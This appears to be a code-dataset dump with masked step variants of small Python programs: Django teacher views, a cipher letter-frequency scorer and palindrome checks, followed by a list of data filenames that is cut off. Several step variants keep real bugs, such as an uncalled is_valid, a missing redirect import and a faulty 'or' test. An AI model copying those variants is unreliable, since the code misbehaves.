code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
from django.http import HttpResponse
from django.shortcuts import redirect, render

from .forms import TeacherForm, Teacher
def add_teacher(request):
    """Create a new Teacher.

    GET renders an empty TeacherForm; a valid POST saves the record and
    redirects to the teacher list; an invalid POST returns HTTP 400.
    """
    if request.method != "POST":
        # Plain page load: show a blank form.
        empty_form = TeacherForm()
        return render(request, "add_teacher.html", {"form": empty_form})
    bound_form = TeacherForm(request.POST)
    if not bound_form.is_valid():
        return HttpResponse("invalid data", status=400)
    bound_form.save()
    return redirect("list_teachers")
def list_teachers(request):
    """Render the complete roster of Teacher records."""
    roster = Teacher.objects.all()
    context = {"teachers": roster}
    return render(request, "list_teachers.html", context)
def teacher_detail(request, pk):
    """Render the detail page for the Teacher with primary key *pk*."""
    record = Teacher.objects.get(pk=pk)
    context = {"teacher": record}
    return render(request, "teacher_detail.html", context)
def edit_teacher(request, pk):
    """Update an existing Teacher.

    GET renders a form pre-populated from the record; a valid POST saves
    the changes and redirects to the teacher list; an invalid POST falls
    through and re-renders the bound form with its errors.
    """
    teacher = Teacher.objects.get(pk=pk)
    if request.method == "POST":
        form = TeacherForm(request.POST, instance=teacher)
        # BUG FIX: the original wrote `if form.is_valid:` — referencing the
        # bound method, which is always truthy — so invalid submissions were
        # saved without validation.  It must be *called*.
        if form.is_valid():
            form.save()
            return redirect("list_teachers")
    else:
        form = TeacherForm(instance=teacher)
    return render(request, "edit_teacher.html", {"form": form})
# Create your views here.
|
normal
|
{
"blob_id": "cf97c87400649dd15e5d006707f9adfbd0c91b2c",
"index": 4118,
"step-1": "<mask token>\n\n\ndef teacher_detail(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n return render(request, 'teacher_detail.html', {'teacher': teacher})\n\n\ndef edit_teacher(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n if request.method == 'POST':\n form = TeacherForm(request.POST, instance=teacher)\n if form.is_valid:\n form.save()\n return redirect('list_teachers')\n else:\n form = TeacherForm(instance=teacher)\n return render(request, 'edit_teacher.html', {'form': form})\n",
"step-2": "<mask token>\n\n\ndef list_teachers(request):\n teachers = Teacher.objects.all()\n return render(request, 'list_teachers.html', {'teachers': teachers})\n\n\ndef teacher_detail(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n return render(request, 'teacher_detail.html', {'teacher': teacher})\n\n\ndef edit_teacher(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n if request.method == 'POST':\n form = TeacherForm(request.POST, instance=teacher)\n if form.is_valid:\n form.save()\n return redirect('list_teachers')\n else:\n form = TeacherForm(instance=teacher)\n return render(request, 'edit_teacher.html', {'form': form})\n",
"step-3": "<mask token>\n\n\ndef add_teacher(request):\n if request.method == 'POST':\n form = TeacherForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('list_teachers')\n else:\n return HttpResponse('invalid data', status=400)\n else:\n form = TeacherForm()\n return render(request, 'add_teacher.html', {'form': form})\n\n\ndef list_teachers(request):\n teachers = Teacher.objects.all()\n return render(request, 'list_teachers.html', {'teachers': teachers})\n\n\ndef teacher_detail(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n return render(request, 'teacher_detail.html', {'teacher': teacher})\n\n\ndef edit_teacher(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n if request.method == 'POST':\n form = TeacherForm(request.POST, instance=teacher)\n if form.is_valid:\n form.save()\n return redirect('list_teachers')\n else:\n form = TeacherForm(instance=teacher)\n return render(request, 'edit_teacher.html', {'form': form})\n",
"step-4": "from django.shortcuts import render\nfrom .forms import TeacherForm, Teacher\nfrom django.http import HttpResponse\n\n\ndef add_teacher(request):\n if request.method == 'POST':\n form = TeacherForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('list_teachers')\n else:\n return HttpResponse('invalid data', status=400)\n else:\n form = TeacherForm()\n return render(request, 'add_teacher.html', {'form': form})\n\n\ndef list_teachers(request):\n teachers = Teacher.objects.all()\n return render(request, 'list_teachers.html', {'teachers': teachers})\n\n\ndef teacher_detail(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n return render(request, 'teacher_detail.html', {'teacher': teacher})\n\n\ndef edit_teacher(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n if request.method == 'POST':\n form = TeacherForm(request.POST, instance=teacher)\n if form.is_valid:\n form.save()\n return redirect('list_teachers')\n else:\n form = TeacherForm(instance=teacher)\n return render(request, 'edit_teacher.html', {'form': form})\n",
"step-5": "from django.shortcuts import render\r\nfrom .forms import TeacherForm,Teacher\r\nfrom django.http import HttpResponse\r\n\r\n\r\ndef add_teacher(request):\r\n\tif request.method==\"POST\":\r\n\t\tform=TeacherForm(request.POST)\r\n\t\tif form.is_valid():\r\n\t\t\tform.save()\r\n\t\t\treturn redirect(\"list_teachers\")\r\n\t\telse:\r\n\t\t\treturn HttpResponse(\"invalid data\",status=400)\r\n\t\t\r\n\telse:\r\n\t\tform=TeacherForm()\r\n\r\n\treturn render(request,\"add_teacher.html\",{\"form\":form})\r\n\r\ndef list_teachers(request):\r\n\tteachers=Teacher.objects.all()\r\n\treturn render(request, \"list_teachers.html\",{\"teachers\":teachers})\r\n\r\ndef teacher_detail(request, pk):\r\n\r\n\tteacher=Teacher.objects.get(pk=pk)\r\n\r\n\treturn render(request, \"teacher_detail.html\",{\"teacher\":teacher})\r\n\r\ndef edit_teacher(request, pk):\r\n\t\r\n\tteacher=Teacher.objects.get(pk=pk)\r\n\r\n\tif request.method== \"POST\":\r\n\t\tform=TeacherForm(request.POST, instance=teacher)\r\n\r\n\t\tif form.is_valid:\r\n\t\t\tform.save()\r\n\t\t\treturn redirect(\"list_teachers\")\r\n\r\n\telse:\r\n\t\tform=TeacherForm(instance=teacher)\r\n\r\n\treturn render(request, \"edit_teacher.html\",{\"form\":form})\r\n\t# form = TeacherForm()\r\n\t# return render(request,\"add_teacher.html\",{\"form\":form})\r\n# Create your views here.\r\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#import getCanditatemap() from E_18_hacksub
import operator, pdb, collections, string
# Candidate characters ranked from most to least frequent in English text;
# position in this string is used as a tie-breaking sort key below.
ETAOIN = """ etaoinsrhldcumgyfpwb.,vk0-'x)(1j2:q"/5!?z346879%[]*=+|_;\>$#^&@<~{}`""" #order taken from https://mdickens.me/typing/theory-of-letter-frequency.html, with space added at the start, 69 characters overall
# Number of character codes tracked (the full 7-bit ASCII range, chr(0)..chr(127)).
length = 128
#ETAOIN ="ETAOINSHRDLCUMWFGYPBVKJXQZ"
def getCanditatemap():
    """Return a dict mapping each of the first `length` ASCII characters to 0."""
    return {chr(code): 0 for code in range(length)}
def getLettercount(mess):
    """Count occurrences in *mess* of every character tracked by getCanditatemap().

    Characters outside the candidate map are ignored.
    """
    counts = getCanditatemap()
    for symbol in mess:
        if symbol in counts:
            counts[symbol] = counts[symbol] + 1
    return counts
def getFreqOrder(mess):
    """Return the tracked characters ordered from most to least frequent in *mess*.

    Within a group of characters sharing the same frequency, ties are broken
    by *reversed* ETAOIN position, matching the original implementation.
    """
    char_freq = getLettercount(mess)
    # Invert the mapping: bucket every character under its frequency count.
    buckets = {}
    for code in range(length):
        symbol = chr(code)
        buckets.setdefault(char_freq[symbol], []).append(symbol)
    # Walk frequencies from highest to lowest; within each bucket, order the
    # characters by reverse ETAOIN rank and flatten into one string.
    pieces = []
    for freq in sorted(buckets, reverse=True):
        ranked = sorted(buckets[freq], key=ETAOIN.find, reverse=True)
        pieces.append(''.join(ranked))
    return ''.join(pieces)
def englishFreqMatch(message):
    """Score how closely *message*'s character frequencies match English.

    Awards one point for each of the 16 most common English characters that
    also appears among the 16 most frequent characters of the message, and
    one point for each of the 16 least common that appears among the 16
    least frequent.  Maximum score is 32.

    BUG FIX: the original tested membership against
    `(ETAOIN[:16] or ETAOIN[-16:])`.  Because a non-empty string is truthy,
    `or` always returned the first operand, so the rare-character half of
    the comparison was silently never performed; the same flaw applied to
    the `freqOrder` side.  Both halves are now checked explicitly.
    """
    matchscore = 0
    # Lower-case first: only relative frequency matters, not letter case.
    freqOrder = getFreqOrder(message.lower())
    for commletter in ETAOIN[:16]:
        if commletter in freqOrder[:16]:
            matchscore += 1
    for rareletter in ETAOIN[-16:]:
        if rareletter in freqOrder[-16:]:
            matchscore += 1
    return matchscore
|
normal
|
{
"blob_id": "63a9060e9933cc37b7039833be5f071cc7bf45bf",
"index": 7873,
"step-1": "<mask token>\n\n\ndef getLettercount(mess):\n charcount = getCanditatemap()\n for char in mess:\n if char in charcount:\n charcount[char] += 1\n return charcount\n\n\n<mask token>\n\n\ndef englishFreqMatch(message):\n matchscore = 0\n freqOrder = getFreqOrder(message.lower())\n for commletter in (ETAOIN[:16] or ETAOIN[-16:]):\n if commletter in (freqOrder[:16] or freqOrder[-16:]):\n matchscore += 1\n return matchscore\n",
"step-2": "<mask token>\n\n\ndef getCanditatemap():\n return dict.fromkeys((chr(i) for i in range(length)), 0)\n\n\ndef getLettercount(mess):\n charcount = getCanditatemap()\n for char in mess:\n if char in charcount:\n charcount[char] += 1\n return charcount\n\n\n<mask token>\n\n\ndef englishFreqMatch(message):\n matchscore = 0\n freqOrder = getFreqOrder(message.lower())\n for commletter in (ETAOIN[:16] or ETAOIN[-16:]):\n if commletter in (freqOrder[:16] or freqOrder[-16:]):\n matchscore += 1\n return matchscore\n",
"step-3": "<mask token>\nETAOIN = (\n ' etaoinsrhldcumgyfpwb.,vk0-\\'x)(1j2:q\"/5!?z346879%[]*=+|_;\\\\>$#^&@<~{}`')\nlength = 128\n\n\ndef getCanditatemap():\n return dict.fromkeys((chr(i) for i in range(length)), 0)\n\n\ndef getLettercount(mess):\n charcount = getCanditatemap()\n for char in mess:\n if char in charcount:\n charcount[char] += 1\n return charcount\n\n\ndef getFreqOrder(mess):\n lettertofreq = getLettercount(mess)\n freqtochar = {}\n for i in range(length):\n i = chr(i)\n if lettertofreq[i] not in freqtochar:\n freqtochar[lettertofreq[i]] = [i]\n else:\n freqtochar[lettertofreq[i]].append(i)\n for freq in freqtochar:\n freqtochar[freq].sort(key=ETAOIN.find, reverse=True)\n freqtochar[freq] = ''.join(freqtochar[freq])\n freqpairs = collections.OrderedDict(sorted(freqtochar.items(), reverse=\n True))\n freqorder = []\n values = freqpairs.values()\n for freqpair in values:\n freqorder.append(freqpair)\n return ''.join(freqorder)\n\n\ndef englishFreqMatch(message):\n matchscore = 0\n freqOrder = getFreqOrder(message.lower())\n for commletter in (ETAOIN[:16] or ETAOIN[-16:]):\n if commletter in (freqOrder[:16] or freqOrder[-16:]):\n matchscore += 1\n return matchscore\n",
"step-4": "import operator, pdb, collections, string\nETAOIN = (\n ' etaoinsrhldcumgyfpwb.,vk0-\\'x)(1j2:q\"/5!?z346879%[]*=+|_;\\\\>$#^&@<~{}`')\nlength = 128\n\n\ndef getCanditatemap():\n return dict.fromkeys((chr(i) for i in range(length)), 0)\n\n\ndef getLettercount(mess):\n charcount = getCanditatemap()\n for char in mess:\n if char in charcount:\n charcount[char] += 1\n return charcount\n\n\ndef getFreqOrder(mess):\n lettertofreq = getLettercount(mess)\n freqtochar = {}\n for i in range(length):\n i = chr(i)\n if lettertofreq[i] not in freqtochar:\n freqtochar[lettertofreq[i]] = [i]\n else:\n freqtochar[lettertofreq[i]].append(i)\n for freq in freqtochar:\n freqtochar[freq].sort(key=ETAOIN.find, reverse=True)\n freqtochar[freq] = ''.join(freqtochar[freq])\n freqpairs = collections.OrderedDict(sorted(freqtochar.items(), reverse=\n True))\n freqorder = []\n values = freqpairs.values()\n for freqpair in values:\n freqorder.append(freqpair)\n return ''.join(freqorder)\n\n\ndef englishFreqMatch(message):\n matchscore = 0\n freqOrder = getFreqOrder(message.lower())\n for commletter in (ETAOIN[:16] or ETAOIN[-16:]):\n if commletter in (freqOrder[:16] or freqOrder[-16:]):\n matchscore += 1\n return matchscore\n",
"step-5": "#import getCanditatemap() from E_18_hacksub\nimport operator, pdb, collections, string\n\nETAOIN = \"\"\" etaoinsrhldcumgyfpwb.,vk0-'x)(1j2:q\"/5!?z346879%[]*=+|_;\\>$#^&@<~{}`\"\"\" #order taken from https://mdickens.me/typing/theory-of-letter-frequency.html, with space added at the start, 69 characters overall\nlength = 128\n#ETAOIN =\"ETAOINSHRDLCUMWFGYPBVKJXQZ\"\n\ndef getCanditatemap():\n return (dict.fromkeys((chr(i) for i in range (length)),0)) # https://stackoverflow.com/questions/2241891/how-to-initialize-a-dict-with-keys-from-a-list-and-empty-value-in-python/2241904\n\ndef getLettercount(mess):\n \n charcount = getCanditatemap()\n for char in mess:\n if char in charcount:\n charcount[char] +=1\n \n return charcount\n\ndef getFreqOrder(mess):\n\n #get a dictionary of each letter and its frequency count\n lettertofreq = getLettercount(mess)\n\n # second, make a dictionary of each frequency count to each letter(s) with that frequency\n freqtochar = {}\n for i in range(length):\n i=chr(i)\n if lettertofreq[i] not in freqtochar: # look for frequencies not present\n freqtochar[lettertofreq[i]] = [i] # add if not present, else append\n else:\n freqtochar[lettertofreq[i]].append(i)\n\n #reverse ETAOIN order, for each list of letters (per frequency)\n for freq in freqtochar:\n freqtochar[freq].sort(key=ETAOIN.find, reverse=True)\n freqtochar[freq] = ''.join(freqtochar[freq]) # convert to string\n \n # sort them in order of frequency\n #freqpairs = sorted(freqtochar.items(), key=operator.itemgetter(0), reverse=True)\n freqpairs = collections.OrderedDict(sorted(freqtochar.items(), reverse=True))\n \n # extractst the values and joins them together\n freqorder = []\n #print freqtochar\n values = freqpairs.values() # grabs the values only\n for freqpair in values:\n #print freqpair\n #pdb.set_trace() \n freqorder.append(freqpair)\n\n return ''.join(freqorder)\n\ndef englishFreqMatch(message):\n \n #print message\n matchscore =0\n freqOrder = 
getFreqOrder(message.lower()) # convert to lower case as we are just looking for frequency match score, so case of the letter should not matter\n #print freqOrder\n #pdb.set_trace()\n\n for commletter in (ETAOIN[:16] or ETAOIN[-16:]):\n if commletter in (freqOrder[:16] or freqOrder[-16:]):\n matchscore +=1\n return matchscore\n",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
# @Time : 2019/6/2 8:42
# @Author : Xu Huipeng
# @Blog : https://brycexxx.github.io/
class Solution:
    """Four alternative solutions to LeetCode 9: is an integer a palindrome?"""

    def isPalindrome(self, x: int) -> bool:
        """String conversion with a two-pointer comparison.

        Negative numbers fail naturally because '-' never matches a digit.
        """
        digits = str(x)
        lo, hi = 0, len(digits) - 1
        while lo < hi:
            if digits[lo] != digits[hi]:
                return False
            lo += 1
            hi -= 1
        return True

    def isPalindrome1(self, x: int) -> bool:
        """Extract the decimal digits into a list, then two-pointer compare."""
        if x < 0:
            return False
        extracted = []
        while x >= 1:
            quotient = x // 10
            extracted.append(x - quotient * 10)  # current lowest digit
            x = quotient
        lo, hi = 0, len(extracted) - 1
        while lo < hi:
            if extracted[lo] != extracted[hi]:
                return False
            lo += 1
            hi -= 1
        return True

    def isPalindrome2(self, x: int) -> bool:
        """Arithmetically peel matching digits off both ends of the number."""
        if x < 0:
            return False
        divisor = 1
        # Grow the divisor until it isolates the leading digit.
        while x // divisor >= 10:
            divisor *= 10
        while x > 0:
            leading = x // divisor
            trailing = x % 10
            if leading != trailing:
                return False
            # Strip both the leading and trailing digits.
            x = (x % divisor) // 10
            divisor //= 100
        return True

    def isPalindrome3(self, x: int) -> bool:
        """Reverse only the lower half of the number and compare the halves."""
        # A non-zero multiple of 10 can never be a palindrome (no leading zeros).
        if x < 0 or (x % 10 == 0 and x != 0):
            return False
        reversed_tail = 0
        while reversed_tail < x:
            reversed_tail = reversed_tail * 10 + x % 10
            x //= 10
        # Even digit count: halves equal; odd: drop the middle digit.
        return reversed_tail == x or reversed_tail // 10 == x
if __name__ == '__main__':
    # Quick smoke test of the half-reversal variant.
    print(Solution().isPalindrome3(121))
|
normal
|
{
"blob_id": "40f57ccb1e36d307b11e367a2fb2f6c97051c65b",
"index": 6759,
"step-1": "class Solution:\n\n def isPalindrome(self, x: int) ->bool:\n num_str = str(x)\n i, j = 0, len(num_str) - 1\n while i < j:\n if num_str[i] == num_str[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome1(self, x: int) ->bool:\n if x < 0:\n return False\n res = []\n while x >= 1:\n tmp = x // 10\n res.append(x - tmp * 10)\n x = tmp\n i, j = 0, len(res) - 1\n while i < j:\n if res[i] == res[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Solution:\n\n def isPalindrome(self, x: int) ->bool:\n num_str = str(x)\n i, j = 0, len(num_str) - 1\n while i < j:\n if num_str[i] == num_str[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome1(self, x: int) ->bool:\n if x < 0:\n return False\n res = []\n while x >= 1:\n tmp = x // 10\n res.append(x - tmp * 10)\n x = tmp\n i, j = 0, len(res) - 1\n while i < j:\n if res[i] == res[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome2(self, x: int) ->bool:\n if x < 0:\n return False\n div = 1\n while x // div >= 10:\n div *= 10\n while x > 0:\n left = x // div\n right = x % 10\n if left != right:\n return False\n x = x % div // 10\n div //= 100\n return True\n <mask token>\n\n\n<mask token>\n",
"step-3": "class Solution:\n\n def isPalindrome(self, x: int) ->bool:\n num_str = str(x)\n i, j = 0, len(num_str) - 1\n while i < j:\n if num_str[i] == num_str[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome1(self, x: int) ->bool:\n if x < 0:\n return False\n res = []\n while x >= 1:\n tmp = x // 10\n res.append(x - tmp * 10)\n x = tmp\n i, j = 0, len(res) - 1\n while i < j:\n if res[i] == res[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome2(self, x: int) ->bool:\n if x < 0:\n return False\n div = 1\n while x // div >= 10:\n div *= 10\n while x > 0:\n left = x // div\n right = x % 10\n if left != right:\n return False\n x = x % div // 10\n div //= 100\n return True\n\n def isPalindrome3(self, x: int) ->bool:\n if x < 0 or x % 10 == 0 and x != 0:\n return False\n revert_num = 0\n while revert_num < x:\n num = x % 10\n revert_num = revert_num * 10 + num\n x //= 10\n return revert_num == x or revert_num // 10 == x\n\n\n<mask token>\n",
"step-4": "class Solution:\n\n def isPalindrome(self, x: int) ->bool:\n num_str = str(x)\n i, j = 0, len(num_str) - 1\n while i < j:\n if num_str[i] == num_str[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome1(self, x: int) ->bool:\n if x < 0:\n return False\n res = []\n while x >= 1:\n tmp = x // 10\n res.append(x - tmp * 10)\n x = tmp\n i, j = 0, len(res) - 1\n while i < j:\n if res[i] == res[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome2(self, x: int) ->bool:\n if x < 0:\n return False\n div = 1\n while x // div >= 10:\n div *= 10\n while x > 0:\n left = x // div\n right = x % 10\n if left != right:\n return False\n x = x % div // 10\n div //= 100\n return True\n\n def isPalindrome3(self, x: int) ->bool:\n if x < 0 or x % 10 == 0 and x != 0:\n return False\n revert_num = 0\n while revert_num < x:\n num = x % 10\n revert_num = revert_num * 10 + num\n x //= 10\n return revert_num == x or revert_num // 10 == x\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.isPalindrome3(121))\n",
"step-5": "# @Time : 2019/6/2 8:42\n# @Author : Xu Huipeng\n# @Blog : https://brycexxx.github.io/\n\nclass Solution:\n def isPalindrome(self, x: int) -> bool:\n num_str = str(x)\n i, j = 0, len(num_str) - 1\n while i < j:\n if num_str[i] == num_str[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome1(self, x: int) -> bool:\n if x < 0: return False\n res = []\n while x >= 1:\n tmp = x // 10\n res.append(x - tmp * 10)\n x = tmp\n i, j = 0, len(res) - 1\n while i < j:\n if res[i] == res[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome2(self, x: int) -> bool:\n if x < 0: return False\n div = 1\n while x // div >= 10: div *= 10\n while x > 0:\n left = x // div\n right = x % 10\n if left != right: return False\n x = (x % div) // 10\n div //= 100\n return True\n\n def isPalindrome3(self, x: int) -> bool:\n if x < 0 or (x % 10 == 0 and x != 0): return False\n revert_num = 0\n while revert_num < x:\n num = x % 10\n revert_num = revert_num * 10 + num\n x //= 10\n return revert_num == x or revert_num // 10 == x\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.isPalindrome3(121))\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
files = ['data0Tue_Dec_30_20_37_34_2014.txt',
'data0Tue_Dec_30_20_37_49_2014.txt',
'data0Tue_Dec_30_20_38_04_2014.txt',
'data0Tue_Dec_30_20_38_19_2014.txt',
'data0Tue_Dec_30_20_38_34_2014.txt',
'data0Tue_Dec_30_20_38_49_2014.txt',
'data0Tue_Dec_30_20_39_04_2014.txt',
'data0Tue_Dec_30_20_39_19_2014.txt',
'data0Tue_Dec_30_20_39_34_2014.txt',
'data0Tue_Dec_30_20_39_49_2014.txt',
'data0Tue_Dec_30_20_40_04_2014.txt',
'data0Tue_Dec_30_20_40_19_2014.txt',
'data0Tue_Dec_30_20_40_34_2014.txt',
'data0Tue_Dec_30_20_40_49_2014.txt',
'data0Tue_Dec_30_20_41_04_2014.txt',
'data0Tue_Dec_30_20_41_18_2014.txt',
'data0Tue_Dec_30_20_41_34_2014.txt',
'data0Tue_Dec_30_20_41_49_2014.txt',
'data0Tue_Dec_30_20_42_04_2014.txt',
'data0Tue_Dec_30_20_42_19_2014.txt',
'data0Tue_Dec_30_20_42_34_2014.txt',
'data0Tue_Dec_30_20_42_49_2014.txt',
'data0Tue_Dec_30_20_43_04_2014.txt',
'data0Tue_Dec_30_20_43_19_2014.txt',
'data0Tue_Dec_30_20_43_34_2014.txt',
'data0Tue_Dec_30_20_43_49_2014.txt',
'data0Tue_Dec_30_20_44_04_2014.txt',
'data0Tue_Dec_30_20_44_19_2014.txt',
'data0Tue_Dec_30_20_44_34_2014.txt',
'data0Tue_Dec_30_20_44_49_2014.txt',
'data0Tue_Dec_30_20_45_04_2014.txt',
'data0Tue_Dec_30_20_45_19_2014.txt',
'data0Tue_Dec_30_20_45_34_2014.txt',
'data0Tue_Dec_30_20_45_49_2014.txt',
'data0Tue_Dec_30_20_46_04_2014.txt',
'data0Tue_Dec_30_20_46_19_2014.txt',
'data0Tue_Dec_30_20_46_34_2014.txt',
'data0Tue_Dec_30_20_46_49_2014.txt',
'data0Tue_Dec_30_20_47_04_2014.txt',
'data0Tue_Dec_30_20_47_19_2014.txt',
'data0Tue_Dec_30_20_47_34_2014.txt',
'data0Tue_Dec_30_20_47_50_2014.txt',
'data0Tue_Dec_30_20_48_05_2014.txt',
'data0Tue_Dec_30_20_48_20_2014.txt',
'data0Tue_Dec_30_20_48_35_2014.txt',
'data0Tue_Dec_30_20_48_50_2014.txt',
'data0Tue_Dec_30_20_49_05_2014.txt',
'data0Tue_Dec_30_20_49_20_2014.txt',
'data0Tue_Dec_30_20_49_35_2014.txt',
'data0Tue_Dec_30_20_49_50_2014.txt',
'data1Tue_Dec_30_20_50_05_2014.txt',
'data1Tue_Dec_30_20_50_20_2014.txt',
'data1Tue_Dec_30_20_50_35_2014.txt',
'data1Tue_Dec_30_20_50_50_2014.txt',
'data1Tue_Dec_30_20_51_05_2014.txt',
'data1Tue_Dec_30_20_51_20_2014.txt',
'data1Tue_Dec_30_20_51_35_2014.txt',
'data1Tue_Dec_30_20_51_50_2014.txt',
'data1Tue_Dec_30_20_52_05_2014.txt',
'data1Tue_Dec_30_20_52_20_2014.txt',
'data1Tue_Dec_30_20_52_35_2014.txt',
'data1Tue_Dec_30_20_52_50_2014.txt',
'data1Tue_Dec_30_20_53_05_2014.txt',
'data1Tue_Dec_30_20_53_20_2014.txt',
'data1Tue_Dec_30_20_53_35_2014.txt',
'data1Tue_Dec_30_20_53_50_2014.txt',
'data1Tue_Dec_30_20_54_04_2014.txt',
'data1Tue_Dec_30_20_54_19_2014.txt',
'data1Tue_Dec_30_20_54_34_2014.txt',
'data1Tue_Dec_30_20_54_49_2014.txt',
'data1Tue_Dec_30_20_55_04_2014.txt',
'data1Tue_Dec_30_20_55_19_2014.txt',
'data1Tue_Dec_30_20_55_34_2014.txt',
'data1Tue_Dec_30_20_55_49_2014.txt',
'data1Tue_Dec_30_20_56_04_2014.txt',
'data1Tue_Dec_30_20_56_19_2014.txt',
'data1Tue_Dec_30_20_56_34_2014.txt',
'data1Tue_Dec_30_20_56_49_2014.txt',
'data1Tue_Dec_30_20_57_04_2014.txt',
'data1Tue_Dec_30_20_57_19_2014.txt',
'data1Tue_Dec_30_20_57_33_2014.txt',
'data1Tue_Dec_30_20_57_48_2014.txt',
'data1Tue_Dec_30_20_58_03_2014.txt',
'data1Tue_Dec_30_20_58_18_2014.txt',
'data1Tue_Dec_30_20_58_33_2014.txt',
'data1Tue_Dec_30_20_58_48_2014.txt',
'data1Tue_Dec_30_20_59_03_2014.txt',
'data1Tue_Dec_30_20_59_18_2014.txt',
'data1Tue_Dec_30_20_59_33_2014.txt',
'data1Tue_Dec_30_20_59_48_2014.txt',
'data1Tue_Dec_30_21_00_03_2014.txt',
'data1Tue_Dec_30_21_00_17_2014.txt',
'data1Tue_Dec_30_21_00_32_2014.txt',
'data1Tue_Dec_30_21_00_47_2014.txt',
'data1Tue_Dec_30_21_01_02_2014.txt',
'data1Tue_Dec_30_21_01_17_2014.txt',
'data1Tue_Dec_30_21_01_32_2014.txt',
'data1Tue_Dec_30_21_01_47_2014.txt',
'data1Tue_Dec_30_21_02_03_2014.txt',
'data1Tue_Dec_30_21_02_17_2014.txt',
'data2Tue_Dec_30_21_02_32_2014.txt',
'data2Tue_Dec_30_21_02_47_2014.txt',
'data2Tue_Dec_30_21_03_02_2014.txt',
'data2Tue_Dec_30_21_03_17_2014.txt',
'data2Tue_Dec_30_21_03_32_2014.txt',
'data2Tue_Dec_30_21_03_47_2014.txt',
'data2Tue_Dec_30_21_04_02_2014.txt',
'data2Tue_Dec_30_21_04_17_2014.txt',
'data2Tue_Dec_30_21_04_31_2014.txt',
'data2Tue_Dec_30_21_04_46_2014.txt',
'data2Tue_Dec_30_21_05_01_2014.txt',
'data2Tue_Dec_30_21_05_16_2014.txt',
'data2Tue_Dec_30_21_05_31_2014.txt',
'data2Tue_Dec_30_21_05_45_2014.txt',
'data2Tue_Dec_30_21_06_00_2014.txt',
'data2Tue_Dec_30_21_06_16_2014.txt',
'data2Tue_Dec_30_21_06_31_2014.txt',
'data2Tue_Dec_30_21_06_46_2014.txt',
'data2Tue_Dec_30_21_07_01_2014.txt',
'data2Tue_Dec_30_21_07_16_2014.txt',
'data2Tue_Dec_30_21_07_31_2014.txt',
'data2Tue_Dec_30_21_07_46_2014.txt',
'data2Tue_Dec_30_21_08_01_2014.txt',
'data2Tue_Dec_30_21_08_16_2014.txt',
'data2Tue_Dec_30_21_08_30_2014.txt',
'data2Tue_Dec_30_21_08_45_2014.txt',
'data2Tue_Dec_30_21_09_01_2014.txt',
'data2Tue_Dec_30_21_09_16_2014.txt',
'data2Tue_Dec_30_21_09_31_2014.txt',
'data2Tue_Dec_30_21_09_46_2014.txt',
'data2Tue_Dec_30_21_10_00_2014.txt',
'data2Tue_Dec_30_21_10_16_2014.txt',
'data2Tue_Dec_30_21_10_31_2014.txt',
'data2Tue_Dec_30_21_10_45_2014.txt',
'data2Tue_Dec_30_21_11_00_2014.txt',
'data2Tue_Dec_30_21_11_16_2014.txt',
'data2Tue_Dec_30_21_11_31_2014.txt',
'data2Tue_Dec_30_21_11_45_2014.txt',
'data2Tue_Dec_30_21_12_01_2014.txt',
'data2Tue_Dec_30_21_12_16_2014.txt',
'data2Tue_Dec_30_21_12_31_2014.txt',
'data2Tue_Dec_30_21_12_46_2014.txt',
'data2Tue_Dec_30_21_13_00_2014.txt',
'data2Tue_Dec_30_21_13_15_2014.txt',
'data2Tue_Dec_30_21_13_31_2014.txt',
'data2Tue_Dec_30_21_13_46_2014.txt',
'data2Tue_Dec_30_21_14_00_2014.txt',
'data2Tue_Dec_30_21_14_15_2014.txt',
'data2Tue_Dec_30_21_14_30_2014.txt',
'data2Tue_Dec_30_21_14_45_2014.txt',
'data3Tue_Dec_30_21_15_00_2014.txt',
'data3Tue_Dec_30_21_15_15_2014.txt',
'data3Tue_Dec_30_21_15_29_2014.txt',
'data3Tue_Dec_30_21_15_44_2014.txt',
'data3Tue_Dec_30_21_15_59_2014.txt',
'data3Tue_Dec_30_21_16_15_2014.txt',
'data3Tue_Dec_30_21_16_30_2014.txt',
'data3Tue_Dec_30_21_16_44_2014.txt',
'data3Tue_Dec_30_21_16_59_2014.txt',
'data3Tue_Dec_30_21_17_15_2014.txt',
'data3Tue_Dec_30_21_17_29_2014.txt',
'data3Tue_Dec_30_21_17_45_2014.txt',
'data3Tue_Dec_30_21_18_00_2014.txt',
'data3Tue_Dec_30_21_18_15_2014.txt',
'data3Tue_Dec_30_21_18_29_2014.txt',
'data3Tue_Dec_30_21_18_44_2014.txt',
'data3Tue_Dec_30_21_18_59_2014.txt',
'data3Tue_Dec_30_21_19_14_2014.txt',
'data3Tue_Dec_30_21_19_29_2014.txt',
'data3Tue_Dec_30_21_19_44_2014.txt',
'data3Tue_Dec_30_21_19_59_2014.txt',
'data3Tue_Dec_30_21_20_14_2014.txt',
'data3Tue_Dec_30_21_20_29_2014.txt',
'data3Tue_Dec_30_21_20_45_2014.txt',
